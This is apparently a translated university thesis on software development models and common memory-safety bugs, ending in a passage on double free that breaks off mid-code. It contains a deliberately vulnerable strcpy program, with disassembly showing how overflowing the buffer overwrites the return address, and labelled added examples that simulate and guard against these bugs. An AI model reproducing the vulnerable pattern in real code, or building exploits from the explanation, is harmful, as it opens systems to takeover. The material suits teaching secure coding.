TABLE OF CONTENTS

LIST OF ABBREVIATIONS
LIST OF TABLES
LIST OF FIGURES
PREFACE
CHAPTER I. OVERVIEW OF THE SOFTWARE DEVELOPMENT PROCESS
1.1. GENERAL INTRODUCTION
1.1.1. The concept of software
1.1.2. The software development process
1.2. COMPONENTS OF SOFTWARE
1.2.1. Documents of the software development process
1.2.2. Components that make up a software product
1.3. SOFTWARE DEVELOPMENT MODELS
1.3.1. The Waterfall model
1.3.2. The V model
1.3.3. The prototype model
1.3.4. The evolutionary model
1.3.5. The iterative and incremental model
1.3.6. The rapid development model
1.3.7. The spiral model
Conclusion of Chapter I
CHAPTER II. SOFTWARE SECURITY BUGS, SOME COMMON SOFTWARE SECURITY BUGS
2.1. GENERAL INTRODUCTION
2.1.1. Definition of a software bug
2.1.2. Definition of a software security bug
2.2. STACK-BASED BUFFER OVERFLOW
2.2.1. Understanding the stack
2.2.2. Stack overflow (Stack Based Buffer Overflow)
2.3. HEAP-BASED BUFFER OVERFLOW
2.4. DOUBLE FREE
Conclusion of Chapter II
CHAPTER III. TECHNIQUES FOR FINDING BUGS AND STEPS FOR EXPLOITING SOFTWARE SECURITY BUGS
3.1. FINDING AND DETECTING BUGS
3.1.1. In the role of the programmer
3.1.2. In the role of the tester
3.1.3. In the role of the hacker
3.2. STEPS FOR EXPLOITING A BUG
3.2.1. Attaching the program to the debugger
3.2.2. Determining the exact position of EIP in the buffer
3.2.3. Finding memory space to store the shellcode
3.2.4. Jumping to the shellcode reliably
3.2.5. Obtaining shellcode and completing the exploit
3.3. TECHNIQUES FOR JUMPING TO THE SHELLCODE
3.3.1. jump (or call)
3.3.2. pop return
3.3.3. push return
3.3.4. jmp [reg + offset]
3.3.5. blind return
3.3.6. Dealing with small buffers
3.3.7. SEH (Structured Exception Handling)
3.3.8. Some other techniques
3.4. SHELLCODE BACKDOOR
Conclusion of Chapter III
PROPOSAL FOR A SECURE SOFTWARE DEVELOPMENT PROCESS
CONCLUSION AND FUTURE DIRECTIONS
REFERENCES
APPENDICES
1. APPENDIX 1: THE PROGRAM WHEN LOADED IN MEMORY
2. APPENDIX 2: THE PROCESS MEMORY
3. APPENDIX 3
4. APPENDIX 4: OPCODE TABLE OF JUMP AND CALL INSTRUCTIONS
5. APPENDIX 5: STEPS FOR PERFORMING THE DEMO

LIST OF ABBREVIATIONS

Abbreviation   Term                                       Meaning
SEP            Software Development/Engineering Process   Software development/engineering process
ID             Identifier                                 Identifier
CSDL           Co so du lieu (Vietnamese)                 Database
SRS            Software requirement specification         Software requirements specification
GUI            Graphical user interface                   Graphical user interface
RUP            Rational Unified Process                   Rational Unified Process
RAD            Rapid Application Development              Rapid development model
OS             Operating system                           Operating system
LIFO           Last In First Out                          Last in, first out
ESP            Extended Stack Pointer                     Extended stack pointer
EBP            Extended Base Pointer                      Extended base pointer
EIP            Extended Instruction Pointer               Extended instruction pointer
NOP            No Operation Performed                     Performs no action
DLL            Dynamic Link Library                       Dynamic link library
CPU            Central Processing Unit                    Central processing unit
SEH            Structured Exception Handling              Structured exception handling

LIST OF TABLES
Table 1. List of bug-prone functions
Table 2. Bug-prone constructs
Table 3. Test cases
Table 4. Opcode table of jump and call instructions

LIST OF FIGURES
Figure 1.1: The Waterfall model
Figure 1.2: The V model
Figure 1.3: The Prototype model
Figure 1.4: The evolutionary model
Figure 1.5: The iterative and incremental model
Figure 1.6: Two development models
Figure 1.7: The spiral model
Figure 2.1: Stack
Figure 2.2: Push
Figure 2.3: Pop
Figure 2.4: Peek
Figure 2.5: The stack frame is created
Figure 2.6: Stack after the MOV instruction
Figure 2.7: Stack after the CALL
Figure 2.8: ESP decreases by 4 bytes
Figure 2.9: ESP points to 0022FF5C
Figure 2.10: ESP decreases by 4 bytes again
Figure 2.11: ESP decreases by some bytes to make room for the variable
Figure 2.12: Stack after the MOV instruction
Figure 2.13: ESP points to the start of the string
Figure 2.14: strcpy() overwrites the saved EBP and EIP
Figure 3.1: strcpy, strncpy and strlcpy
Figure 3.2: The application does not crash
Figure 3.3: The application crashes
Figure 3.4: The Windbg interface
Figure 3.5: The Immunity interface
Figure 3.6: EIP contains 42424242 (BBBB)
Figure 3.7: Contents of the buffer after Easy RM to MP3 runs
Figure 3.8: Contents of ESP
Figure 3.9: Contents of EIP after the application crashes
Figure 3.10: EIP holds the value BBBB
Figure 3.11: ESP holds the address 000ff730
Figure 3.12: Contents of the exploit buffer
Figure 3.13: ESP starts at the 5th character
Figure 3.14: ESP points to the first character of the pattern string
Figure 3.15: eip contains 000ff730
Figure 3.16: Attaching windbg to Easy RM to MP3
Figure 3.17: ffe4 is the opcode of jmp esp
Figure 3.18: The opcode of jmp esp in the dll file
Figure 3.19: Result obtained when testing with the NOP/break sequence
Figure 3.20: Successful exploitation
Figure 3.21: Some opcodes
Figure 3.22: EIP overwritten with the address of jmp esp
Figure 3.23: Opcode with the sequence 0x54, 0xc3
Figure 3.24: Memory region filled with A
Figure 3.25: 000ff849 is part of the pattern
Figure 3.26: With a 344-byte shellcode the application crashes
Appendix figure: Memory map of a Win32 process

PREFACE
Today, the development of information technology occupies an ever more important position in every field of life. The explosion of science and technology in general, and of information technology in particular, brings many benefits to people: it shortens geographical distances, raises productivity, and saves time and cost at work.
Now that information technology has developed as strongly as it has today, the computer is an essential object for everyone. Every field of life and every profession involves computers. Everyone who works with a computer is in fact working with software. Software has become an inevitable part of everyone's work when working with a computer. The strong development of software technology has created countless software products and tools serving every human need. Software brings enormous benefits to people; it solves many problems that people previously could not. Yet alongside those great benefits, software also brings no small number of risks. These risks come from the appearance of security holes in the software being used.
So what are these security holes? Why do they appear? How are they exploited? These are the questions many people are looking into. Studying software security holes is an extremely important matter and takes up no small effort of software developers around the world.
The graduation thesis "Research on techniques for finding and exploiting software security holes" is organised into 3 chapters:
Chapter I. Overview of the software development process
- General theory of software
- Software development processes
Chapter II. Common software security bugs
- The concepts of software bug and software security bug
- A look at some common software security bugs
- Analysis of the stack-based buffer overflow
Chapter III. Techniques for finding, detecting and exploiting software security bugs
- Techniques for finding software security bugs
- Techniques for exploiting software security bugs
Since the content involves much new knowledge, and time and knowledge are limited, with the research based mainly on theory, I certainly cannot avoid shortcomings. I very much hope to receive the contributions and comments of the teachers and my friends so that my thesis can be improved day by day.
In carrying out this thesis and completing this internship report, I sincerely thank the leadership of the Academy of Cryptography Techniques for their care and for giving me an environment for study, training and research. I sincerely thank the teachers of the Faculty of Information Technology, the Faculty of Information Security, the Faculty of Basic Sciences and the Faculty of Political Theory for providing me with very valuable knowledge during my five years of study at the school. In particular, I sincerely thank Mr. L M T and Mr. V nh Thu for their enthusiastic guidance and help in completing this thesis.
I sincerely thank you!

CHAPTER I. OVERVIEW OF THE SOFTWARE DEVELOPMENT PROCESS
1.1. GENERAL INTRODUCTION
1.1.1. The concept of software
Software is a set of statements or instructions written in a programming language in a defined order, together with the related data or documents, intended to automatically carry out some task or function or to solve some specific problem.
Software performs its functions by sending instructions directly to the hardware or by supplying data that serves other programs or software.
Software is an abstract concept: it cannot be touched or handled, and it needs hardware in order to execute.
1.1.2. The software development process
A process can be understood as the method of carrying out or manufacturing a product. Similarly, the software development process is the method of developing or producing a software product. Usually a process includes the following basic elements:
- Procedures
- Activity guidelines
- Forms/templates
- Checklists
- Tools
with the following main groups of work:
- Requirements specification: sets out the demands, both functional and non-functional, placed on the system.
- Development: produces software that satisfies the requirements laid down in the requirements specification.
- Validation/testing: ensures that the software produced meets the demands laid down in the requirements specification.
- Evolution: responds to the customer's changing needs.
Depending on the software development model, these groups of work are carried out in different ways. To produce the same software product, different models may be used. Not every model, however, is suitable for every application.
1.2. COMPONENTS OF SOFTWARE
1.2.1. Documents of the software development process
- Customer requirements: this document is the result of the requirements-gathering process. It consists of statements in natural language (and diagrams).
- Product specification: a document describing the software in detail, serving the software design.
- Work plan: a document describing in detail the work to be done during software development.
- Software design documents: including documents on the software structure, data flow diagrams, state diagrams of the exchange process, and code comments.
- Test documents: detailed documents for the testing process, including:
  Test plan
  Test case list
  Bug report
  Test tool list
1.2.2. Components that make up a software product
- Help files
- User's manual
- Samples and examples
- Labels and stickers
- Product support info
- Icons and art
- Error messages
- Ads and marketing material
- Setup and installation
- Readme file [1]
1.3. SOFTWARE DEVELOPMENT MODELS
1.3.1. The Waterfall model

Figure 1.1: The Waterfall model

This model consists of consecutive processing phases, as depicted in the figure:
Requirements and Specifications: the phase that determines the functional and non-functional demands that the software system must satisfy. This phase needs the active participation of the customer and ends with a document called the Software Requirements Specification, or SRS, which contains the set of requirements that have been reviewed and approved by those responsible for the project (on the customer side). The SRS is the foundation for all subsequent activities until the end of the project.
System Analysis and Design: the phase that determines how the software system will meet the demands (what) that the customer stated in the SRS. It is the bridge between the demands (what) and the code that is implemented to meet them.
Coding and Unit Test: the phase that implements the "how" laid out in the system analysis and design phase.
Test: this phase tests the implemented code, including integration testing of groups of components and testing of the whole system (system test). A final testing step is usually acceptance testing, with the customer participating in the main role of determining whether or not the software system meets their requirements.
Deployment and Maintenance: this is the phase of installing and configuring the system and training the customer. It fixes software defects (if any) and develops the new changes the customer asks for (such as modifying, adding or removing functions/features of the system).
In practice it is only in later phases that mistakes in earlier phases are noticed and have to be gone back to and fixed. This is the iterative form of waterfall (Iterative Waterfall).
Advantages: the phases are defined, with clear inputs and outputs. The model is fundamentally document-based, especially in the early phases, where both input and output are documents. The software product is formed through a chain of software-building activities in a clear order.
Disadvantages: it demands that all software requirements be clearly determined right at the start of the project, yet most real projects show that software requirements usually carry quite a few points of uncertainty.
In reality, projects rarely carry out all the steps fully over the project life cycle. Especially in the testing phase close to the delivery date, for instance, if trouble occurs because the software requirements are unclear or the design has errors, the tendency is to modify the source code directly without going through the supplementary steps the model prescribes, so the software specification and some other intermediate products such as the design, even if updated later, may not fully reflect what was changed in the source code.
The user has no opportunity to participate during the intermediate phases from design through testing. Especially with large projects, the user can only discover that the software system does not fit their needs at the end of the project.
In general, this model usually hides many risks that can only be discovered in the final phase (illustrated in the figure), and the cost of correction can be very high.
Application: requirements are defined very clearly and in detail and hardly change, usually originating from a product that has reached stability.
Any newly added requirements (if any) are also identified clearly and fully early in the project.
The team is familiar with and fully understands all of the project's requirements, and has much experience with the technologies used to develop the product.
The project is determined to have almost no risk.
1.3.2. The V model
In the Waterfall model, testing is carried out in a separate phase. In the V model, by contrast, the whole process is divided into two corresponding groups of phases: development and testing. Each development phase is paired with a corresponding testing phase, as illustrated in the figure.

Figure 1.2: The V model

The guiding spirit of the V model is that testing activities must be carried out in parallel (as far as possible) from the very start of the cycle, alongside the development activities. For example, the activities for planning whole-system testing can be carried out in parallel with the system analysis and design activities.
Advantages: testing activities are emphasised and carried out in parallel with the activities concerning requirements specification and design. In other words, the model encourages test-planning activities to be undertaken early in the development cycle, rather than waiting until the end of the implementation phase.
Disadvantages: the same as the waterfall model.
Application: refer to the waterfall model.
1.3.3. The prototype model

Figure 1.3: The Prototype model

The prototype model is illustrated in the figure. In it, the process starts with gathering requirements in the presence of representatives of both the development side and the customer, in order to set out the overall objectives of the future software system, while recording all requirements that can be known and sketching out which groups of requirements still need to be clarified. Then a quick design is carried out, focused on conveying those aspects through the prototype so that the customer can visualise and evaluate them, helping to complete the requirements for the whole software system. This not only helps refine the requirements but also helps the development team better understand what needs to be developed. What follows the prototyping phase may be a cycle following the waterfall model or some other model. Note that the prototype is usually made very quickly in a short time, so it is not built in the same environment and with the same development tools as the later phase of building the real software. The prototype does not aim at reuse in the later real development phase.
Advantages: the user gets an early picture of the functions and features of the system. Communication between developers and users is improved.
Disadvantages: when the prototype does not convey all the functions and features of the software system, the user may be disappointed and lose interest in the system to be developed. The prototype is usually made quickly, even hastily, in an implement-and-fix style, and may lack careful analysis and evaluation of all aspects relating to the final system. In general this model still cannot close the gap between requirements and the final application.
Application: systems based mainly on a user interface (GUI). The customer, especially the end user, cannot clearly determine the requirements.
1.3.4. The evolutionary model

Figure 1.4: The evolutionary model

This model is really also a form based on the prototype model, but with differences:
- The evolutionary model builds many successive prototype versions.
- The earlier prototype versions are built with the aim of being reusable in later versions.
The figure above illustrates the evolutionary model, showing that some parts of the software system can be built early, right from the requirements analysis and design phase.
Advantages: emphasis on reusing the prototype. Part of the system can be developed during the requirements analysis and design phases.
Allows requirements to change and encourages user participation throughout the project cycle.
Disadvantages: slows the requirements development process and may draw attention away from intermediate work such as source code review and low-level testing.
Easily leads to a poor system structure.
Usually with this model, the rigour and transparency of the process are poor.
Application: small and medium interactive systems; the GUI part of large systems; systems that need a short development cycle.
The development team is not familiar with the project's domain.
1.3.5. The iterative and incremental model

Figure 1.5: The iterative and incremental model

The iterative and incremental models are sometimes understood as one. However, one can distinguish some differences. First, the two models share the feature of being based on the spirit of the evolutionary model, and in addition they aim to deliver part of the system that the customer can put to use in the real production environment without waiting until the whole system is complete (in the prototype or evolutionary model, the prototype or intermediate versions are not intended to be put into real operation for the customer, except the final version). So that the customer can use it, each version must be carried out as a full process with all the work from requirements analysis, with the possibility of additions or changes, design and implementation through to testing, and can be regarded as a sub-process (sub-cycle). The sub-cycles may use different models (usually waterfall). The figure above illustrates the two models, in which each sub-cycle is a small waterfall.
The goal of the first version is to develop the core and the group of important functions. After each version is put to use, the evaluation results are fed back and the sub-cycle of the next version is planned in order to carry out:
- Changes to the previous version to meet the customer's needs better
- Possibly adding supplementary functions or features
The difference between the incremental and iterative models can be understood simply as follows (relative to the product completed in the previous sub-cycle):
- Incremental model: add functions to the product (see Figure 1.6).
- Iterative model: change the product (see Figure 1.6).
An SEP may combine both the iterative and the incremental model, for example RUP (Rational Unified Process).

Figure 1.6: Two development models

Advantages: reduces risk early in the software development cycle. The important requirements are usually developed and delivered to the user early.
User feedback and the problems that arose in the previous version are used to improve and prevent similar problems from occurring in later versions.
Disadvantages: the total cost of development planning for the whole system may be higher. Note that this refers only to the initial planning cost, not all costs incurred. In practice, if applied sensibly, the total cost and time until the product is accepted may be lower than with other models.
The requirements on planning and on activities in the process may be more complex.
Application:
Iterative model: the development team is familiar with the project's domain but does not have much experience, especially with the technology used to develop the project.
There are many technical risks.
Incremental model: risks are analysed and identified right from the start.
The interfaces between modules are also clearly defined from the start.
The development team is familiar with the project's domain and has much experience.
A large system developed over a long period, where the customer needs to deploy some parts of the system early.
1.3.6. The rapid development model
The rapid development model (RAD, Rapid Application Development) is the incremental model with extremely short development cycles. To achieve this goal, RAD relies on a development method based on componentising the system together with reusing suitable components. RAD is suited to information management systems.
Advantages: allows reduced development time for applications that have databases and many user interfaces, or that integrate existing components. Users take part in the testing activities.
Disadvantages: it is hard to achieve consistency among components developed by different teams. Not suited to applications that demand performance, and usually dependent on the support of the development environment and a high-level language.
Application: information management systems such as GUI- and database-based applications. There is tool support or a high-level language is used. The system has no strict performance requirements.
1.3.7. The spiral model
This model was built by Barry Boehm; it puts the emphasis on risk analysis and on reviewing the plan for resolving risks, through many successive sub-cycles repeated continuously on the basis of the iterative model. In this model, the analysis and resolution of high-risk problems is focused on designing each specific aspect rather than handling problems in a generic way.

Figure 1.7: The spiral model

Figure 1.7 illustrates this model with phases repeated in a rotating cycle, where each cycle consists of the following 4 sub-phases:
- Determine the quality objectives for the product being made, and at the same time decide whether to buy, reuse, or design and implement the system's components oneself.
- Analyse the options and the risks that may occur. This is done through many different activities, via prototyping or simulation.
- Develop and verify the product at the next level based on the guiding results identified in sub-phase 2 (risk analysis).
- Review all results of the preceding sub-phases and plan the next iteration cycle.
Advantages: risk analysis and assessment are elevated to an essential part of each spiral turn in order to raise the project's reliability.
Combines the best qualities of the waterfall and evolutionary models.
Allows changes according to the project's actual conditions at each spiral turn.
This is the most general model; all other models can be regarded as an instance of this general model, or it can be seen as a synthesis of the other models. In particular, it is applied not only in software development but also in hardware development.
Disadvantages: complex and unsuitable for small projects with little risk. Good risk-analysis skills are needed.
Application: large projects with many risks, or where the success of the project has no firm guarantee; projects requiring much computation and processing, such as decision-support systems. The project team is capable of risk analysis.

Conclusion of Chapter I
Chapter I presented the concepts of software and of the software development process; the basic elements of a software development process; the documents of the software development process and the components that make up a software product; and examined the software development models together with their advantages, disadvantages and application in software development.
Through this chapter we have an initial overview of software and of developing a software product. In the next chapter we will look at software security bugs and some common software security bugs.

CHAPTER II. SOFTWARE SECURITY BUGS, SOME COMMON SOFTWARE SECURITY BUGS
2.1. GENERAL INTRODUCTION
2.1.1. Definition of a software bug
A software bug is a concept used to refer to runtime errors, exploitable holes, errors in results, and incorrect operation of software.
Most bugs arise from mistakes or oversights by the programmer while writing the source code or during design. A few bugs are due to the compiler working incorrectly.
Serious bugs can lead to the program crashing or freezing.
2.1.2. Definition of a software security bug
A software security bug is a software bug that allows an attacker to bypass the system's security mechanisms, for example bypassing the access control mechanism to obtain unauthorised privileges.
Some attacks based on software bugs that are common today and that we often see are: unauthorised remote access, privilege escalation, denial of service.
Some common software security bugs are: stack-based buffer overflow, heap-based buffer overflow, double free.
2.2. STACK-BASED BUFFER OVERFLOW
2.2.1. Understanding the stack
In computer science, a stack (Vietnamese: ngan xep, bo xep chong) is an abstract data structure that operates on the Last In First Out (LIFO) principle: the element added last is the element taken out first.
The stack is part of the process memory. When a program is loaded into memory, the stack segment lies right after the heap segment [2]. The stack is allocated by the OS (operating system) for each thread [3] when the thread is created. When the thread ends, the stack is discarded. The size of the stack is defined when it is created and cannot be changed. Together with LIFO, which requires no complex management mechanism, this makes the stack quite fast. However, it is limited in size.
Every element in a stack must be of the same data type, and that may be any data type. A stack has a bottom and a top. The element at the top of the stack is called the top item. All insertion and deletion of elements takes place at the top of the stack.

Figure 2.1: Stack

A stack is simply a list. Hence it has most of the operations of a list, such as insertion and deletion, though the implementation differs slightly. The most basic stack operations are:
Push: insert an element into the stack

Figure 2.2: Push

Pop: take an element out of the stack

Figure 2.3: Pop

Peek: get the value of the element at the top of the stack

Figure 2.4: Peek

IsEmpty: check whether the stack is empty
Clear: delete all elements in the stack
When the stack is created, the stack pointer points to the top of the stack (the highest address of the stack). As soon as data is pushed onto the stack, the stack pointer decreases (towards lower addresses). Thus the stack grows towards lower addresses.
The stack stores local variables, function calls and other information that does not need to be kept for a long time. Each time a function is called, the function's parameters are pushed onto the stack, and the values held in the registers (EIP, EBP) are saved [4]. When the function ends, the saved value of EIP is taken from the stack and placed back into EIP, so the application can carry on normally.
2.2.2. Stack overflow (Stack Based Buffer Overflow)
A stack overflow occurs when the buffer that stores data in memory does not control the writing of values into it, so that the stack overflows, and that overflow leads to the function's return address being overwritten.
To understand how a stack overflow happens, consider the following example with a stack buffer overflow:

    #include <string.h>
    /* Copies its argument into a 128-byte local buffer without any bound. */
    void do_something(char *Buffer)
    {
        char MyVar[128];
        strcpy(MyVar, Buffer);
    }
    int main(int argc, char **argv)
    {
        if (argc < 2)      /* need one argument, otherwise argv[1] is NULL */
            return 1;
        do_something(argv[1]);
        return 0;
    }

The application takes one argument (argv[1]) and passes it to the function do_something(). In this function the argument is copied into a local variable with a maximum length of 128 bytes. So if the argument is longer than 127 bytes (1 null byte terminates the string), the buffer can overflow.
When do_something() is called from main(), the following happens:
A stack frame is created, with the top of the stack containing the parent stack. The stack pointer (ESP) points to the highest address of the newly created stack. That is the top of the stack.

Figure 2.5: The stack frame is created

Before do_something() is called, the pointer to the argument is pushed onto the stack. In this case it points to argv[1].
Stack after executing the MOV instruction:

Figure 2.6: Stack after the MOV instruction

Next, the function do_something is called. The CALL instruction first puts the current instruction pointer onto the stack (this is where execution returns to when the function finishes) and jumps to the function code.
Stack after executing CALL:

Figure 2.7: Stack after the CALL

After the push, ESP decreases by 4 bytes and points to a lower address:

Figure 2.8: ESP decreases by 4 bytes

ESP points to 0022FF5C; at this address we see the saved EIP (Return to), followed by the pointer to the parameter (AAAA in this example). That pointer was saved on the stack before the CALL was executed.

Figure 2.9: ESP points to 0022FF5C

Next, the function prolog executes. Essentially, the frame pointer (EBP) is put on the stack so that it can be restored when the function returns. The instruction that saves the frame pointer is "push ebp". ESP decreases by another 4 bytes.

Figure 2.10: ESP decreases by 4 bytes again

After "push ebp", the current stack pointer (ESP) is placed into EBP. At this point both ESP and EBP point to the top of the stack. From that moment on, the stack is referenced via ESP (always the top of the stack, at any moment) and EBP, the base pointer of the current stack frame. In this way the application can reference variables using offsets from EBP.
Most functions start with PUSH EBP, followed by MOV EBP,ESP.
So if you push another 4 bytes onto the stack, ESP decreases once more while EBP stays where it is. You can reference these 4 bytes using EBP-0x8.
Next we look at how the stack allocates space for the variable MyVar (128 bytes). To hold the data, some space on the stack is allocated for the variable, and ESP decreases by some number of bytes. This number may be more than 128 bytes, depending on the compiler. In the case of Devcpp [5], it is 0x98 bytes, so you will see the instruction SUB ESP,98. That way there is space for the variable:

Figure 2.11: ESP decreases by some bytes to make room for the variable

The disassembly [6] of the function looks like this:

    00401290 /$ 55                PUSH EBP
    00401291 |. 89E5              MOV EBP,ESP
    00401293 |. 81EC 98000000     SUB ESP,98
    00401299 |. 8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
    0040129C |. 894424 04         MOV DWORD PTR SS:[ESP+4],EAX      ; |
    004012A0 |. 8D85 78FFFFFF     LEA EAX,DWORD PTR SS:[EBP-88]     ; |
    004012A6 |. 890424            MOV DWORD PTR SS:[ESP],EAX        ; |
    004012A9 |. E8 72050000       CALL                              ; \strcpy
    004012AE |. C9                LEAVE
    004012AF \. C3                RETN

The prolog is clearly visible: PUSH EBP and MOV EBP,ESP. Next you see the space being allocated for the variable MyVar: SUB ESP,98. Then you see some MOV and LEA instructions (essentially setting up the parameters for the strcpy call). This can be explained as: take the pointer to argv[1] (which is at EBP+8) and copy it into EAX, then copy EAX to the variable MyVar (at position ESP+4).
In detail:
PUSH EBP: saves EBP. Then MOV EBP,ESP: ESP and EBP both point to the top of the stack, which is the EBP that has just been pushed.
SUB ESP,98: allocates a region of 152 bytes (0x98 hex in decimal).
MOV EAX,DWORD PTR SS:[EBP+8]: EBP plus 8 is the pointer to argv[1]. This step copies the address pointing to argv[1] into EAX. Note that an address is the width of one 32-bit register, i.e. 4 bytes.
MOV DWORD PTR SS:[ESP+4],EAX: copies EAX (i.e. the address of argv[1]) to ESP plus 4. Remember that after SUB ESP,98, ESP has been lowered: it is the top of the stack (as in the figure above) and no longer points to the same place as EBP. ESP plus 4 is 4 down from the top (the stack grows from high to low). At this point the 4 bytes on top of the stack hold the address of argv[1].
LEA EAX,DWORD PTR SS:[EBP-88]: this instruction stores the address EBP minus 0x88 in EAX.
MOV DWORD PTR SS:[ESP],EAX: that address is then written at ESP. ESP now points to EBP minus 0x88, i.e. the start of the place where strcpy() will store the value of argv[1].

Figure 2.12: Stack after the MOV instruction

CALL (strcpy): after it finishes, LEAVE retrieves the saved EBP and RET retrieves the saved EIP, returning to main.
If there were no strcpy() call in this function, the function would finish and unwind the stack. Basically, it moves ESP back to the saved ESP, then executes RET. RET in this case takes the pointer at ESP from the stack and jumps to it. It then returns to the main program, to where do_something() was called. The epilog is performed by the LEAVE instruction, which restores the frame pointer and EIP. In our example, however, there is a strcpy() call.
This function reads data from the address pointed to by [Buffer] and stores it (as in the figure above), reading all the data until it meets a null byte (the string terminator). While copying the data, ESP points to where it is stored. strcpy() does not use PUSH to put data on the stack; it reads 1 byte at a time and places it on the stack using an index (ESP, ESP+1, ESP+2, and so on). After the copy, ESP points to the start of the string.

Figure 2.13: ESP points to the start of the string

That means that if [buffer] is larger than 0x98 bytes, strcpy() will overwrite the saved EBP and also EIP. After that it just keeps reading and writing until it meets a null byte in the source string.

Figure 2.14: strcpy() overwrites the saved EBP and EIP

ESP still points to the start of the string. strcpy() finishes without anything going wrong, and after strcpy() the function (do_something()) finishes. This is where things get interesting. The epilog kicks in. Basically, it moves ESP back to where EIP was saved and performs RET. It takes the pointer there (AAAA, or 0x41414141, depending on the case) and jumps to that address.
Thus you control EIP. By controlling EIP, you change the return address to which the program continues.
Obviously, you can change the return address by taking advantage of the buffer overflow.
So, suppose you can write the buffer in MyVar, EBP and EIP, and you have your own piece of code in the region before or after the saved EIP. After the overwrite, EIP will point to your code. And since you make EIP point to your code, you take control.
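The following is an added example and not code from the thesis: a C model of the do_something() frame described above, written to show which input lengths reach the saved EBP and the saved EIP. It assumes the layout implied by the listing, namely that MyVar starts at EBP-0x88 (from LEA EAX,[EBP-88]), so the saved EBP lies 0x88 = 136 bytes from the start of the buffer and the saved EIP 4 bytes after it; the original saved values are constructed placeholders. The "copy" is simulated into a bounded array, so the program never overflows anything itself.

```c
/* Added example, not from the thesis: a model of the do_something() frame
 * from the listing above, used to find which input length first reaches the
 * saved EBP and the saved EIP.  Layout assumed from the listing:
 *   MyVar starts at EBP-0x88 (LEA EAX,[EBP-88]), so the saved EBP is 0x88 =
 *   136 bytes from the start of the buffer and the saved EIP 4 bytes later.
 * The saved values are constructed placeholders, and the "copy" writes into a
 * bounded array, so this program never overflows anything itself. */
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MYVAR_TO_EBP 0x88                   /* from LEA EAX,[EBP-88]          */
#define SAVED_EBP_AT MYVAR_TO_EBP           /* index of saved EBP in model    */
#define SAVED_EIP_AT (MYVAR_TO_EBP + 4)     /* index of saved EIP in model    */
#define MODEL_SIZE   (MYVAR_TO_EBP + 8)     /* buffer + saved EBP + saved EIP */

struct frame_model {
    uint32_t saved_ebp;     /* value left in the saved-EBP slot after the copy */
    uint32_t saved_eip;     /* value left in the saved-EIP slot after the copy */
    int ebp_clobbered;      /* 1 if any byte of the saved EBP was written      */
    int eip_clobbered;      /* 1 if any byte of the saved EIP was written      */
};

/* Simulate strcpy(MyVar, input): len bytes plus the terminating NUL are
 * written byte by byte from the start of MyVar.  Writes are bounded to the
 * model; a real strcpy() would continue past the saved EIP. */
struct frame_model simulate_copy(const unsigned char *input, size_t len)
{
    unsigned char model[MODEL_SIZE];
    const uint32_t orig_ebp = 0x0022FF78u;   /* constructed placeholder        */
    const uint32_t orig_eip = 0x004012AEu;   /* constructed return address     */
    struct frame_model out;
    size_t i;

    memset(model, 0, sizeof model);
    memcpy(model + SAVED_EBP_AT, &orig_ebp, sizeof orig_ebp);
    memcpy(model + SAVED_EIP_AT, &orig_eip, sizeof orig_eip);

    for (i = 0; i <= len && i < MODEL_SIZE; i++)
        model[i] = (i < len) ? input[i] : 0;  /* index len receives the NUL */

    memcpy(&out.saved_ebp, model + SAVED_EBP_AT, sizeof out.saved_ebp);
    memcpy(&out.saved_eip, model + SAVED_EIP_AT, sizeof out.saved_eip);
    out.ebp_clobbered = (len + 1 > SAVED_EBP_AT);
    out.eip_clobbered = (len + 1 > SAVED_EIP_AT);
    return out;
}

/* Convenience: an input of len 'A' (0x41) bytes, as in the text's example. */
struct frame_model simulate_a_string(size_t len)
{
    unsigned char input[MODEL_SIZE + 64];
    if (len > sizeof input)
        len = sizeof input;
    memset(input, 'A', len);
    return simulate_copy(input, len);
}

/* Input length at which the copy first touches the saved EIP slot (the NUL
 * lands on its first byte); four more bytes replace it completely. */
size_t first_len_touching_eip(void) { return SAVED_EIP_AT; }

int main(void)
{
    size_t lens[] = { 127, 128, 136, 140, 144, 0x98 };
    size_t i;
    printf("%6s %12s %12s\n", "len", "saved EBP", "saved EIP");
    for (i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        struct frame_model m = simulate_a_string(lens[i]);
        printf("%6zu   0x%08" PRIX32 "   0x%08" PRIX32 "%s\n", lens[i],
               m.saved_ebp, m.saved_eip,
               m.eip_clobbered ? "  <- return address reached" : "");
    }
    return 0;
}
```

Running it shows that an input of 127 bytes leaves both saved values intact, 136 bytes already puts the string terminator into the first byte of the saved EBP, and any input of 144 bytes or more replaces the saved EIP with 0x41414141, which is consistent with the text's statement that anything above 0x98 bytes reaches the return address. Reading the LEA offset out of a disassembly and doing this arithmetic is how one confirms a suspected overflow before running anything.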
2.3. HEAP-BASED BUFFER OVERFLOW
The heap is used for dynamic memory allocation. In the C programming language [7], allocation and deallocation are performed through the two functions malloc() and free(). When the program is loaded in memory, the heap segment lies before the stack segment [8].
Because the heap is used to store data, and is not used to store function return addresses the way the stack is, exploiting a heap buffer overflow is much harder than exploiting a stack buffer overflow.
Nevertheless, a heap buffer overflow can still be exploited successfully in the following two ways:
Modifying data: an attacker can exploit the hole by overwriting important data. This may crash the program or change a value that can be exploited later (such as overwriting a user ID to gain additional access rights).
Modifying objects: in many programming languages such as C++ and Objective-C, objects placed on the heap contain tables of function pointers as well as data. An attacker is therefore able to replace other data or even replace the instance methods [9] of the object's class.
2.4. DOUBLE FREE
This bug occurs when free() [10] is called more than once with the same memory address (the memory address is passed to free() as an argument). This can lead to a buffer overflow because the memory management data structures become corrupted. As a result the program may crash, or, in some cases, two later malloc() [11] calls return the same value. This leads to the attacker controlling the data written in the doubly allocated memory region.

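As an added example that is not the thesis's own code, the C program below shows the two defender-side answers to this bug: an allocation wrapper that remembers live pointers and refuses a second free() of the same address (the check a debug allocator performs), and the habit of clearing a pointer after freeing it, which turns a repeated free into free(NULL), a no-op by the C standard. MAX_LIVE and the 32-byte allocation are assumptions made for the example.

```c
/* Added example, not from the thesis: (1) an allocation wrapper that keeps a
 * table of live pointers and refuses a second free() of the same address,
 * which is the check a debug allocator makes; (2) freeing through a helper
 * that also clears the pointer, so a repeated free becomes free(NULL), which
 * the C standard defines as a no-op.  MAX_LIVE and the 32-byte allocation
 * are assumptions made for the example. */
#include <stdio.h>
#include <stdlib.h>

#define MAX_LIVE 64

static void *live[MAX_LIVE];    /* pointers handed out and not yet freed */
static int live_count = 0;

void *tracked_malloc(size_t n)
{
    void *p;
    if (live_count >= MAX_LIVE)
        return NULL;
    p = malloc(n);
    if (p != NULL)
        live[live_count++] = p;
    return p;
}

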